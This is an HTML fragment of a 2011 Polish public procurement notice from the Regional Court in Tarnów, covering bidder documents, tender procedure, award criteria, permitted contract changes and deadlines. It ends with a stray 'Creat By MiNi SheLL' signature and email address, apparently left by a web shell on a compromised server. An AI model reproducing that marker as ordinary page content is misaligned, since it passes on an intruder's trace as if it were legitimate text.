<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Pzp - wzór Załącznik Nr 2 do SIWZ,
pełnomocnictwo (jeśli dotyczy) do reprezentowania i podpisania dokumentacji ofertowej jeżeli Wykonawca jest reprezentowany niezgodnie z zapisem we właściwym rejestrze.
parafowany wzór umowy - Załącznik Nr 3 do SIWZ
formularz oferty - Załącznik Nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	zmiany: danych identyfikacyjnych, personalne w zakresie dot. osób odpowiedzialnych za kontakty i nadzorujących wykonanie umowy, numerów kont, podwykonawców - są dopuszczalne i nie wymagają aneksowania zawartej umowy, wystarczające jest pisemne zgłoszenie wystąpienia ww. zmian,
2)	zmniejszenie  zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, 
3)	w przypadku wystąpienia okoliczności niemożliwych do przewidzenia, w dniu podpisywania umowy, spowodowanych zmianami przepisów prawa w trakcie wykonywania umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tarnow.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Tarnowie
ul. Jarosława Dąbrowskiego 27
33-100 Tarnów,  woj. małopolskie
I pietro, pokój 124 - Oddział Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2011 godzina 08:30, miejsce: Sąd Okręgowy w Tarnowie
ul. Jarosława Dąbrowskiego 27
33-100 Tarnów,  woj. małopolskie
I pietro, pokój 124 - Oddział Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com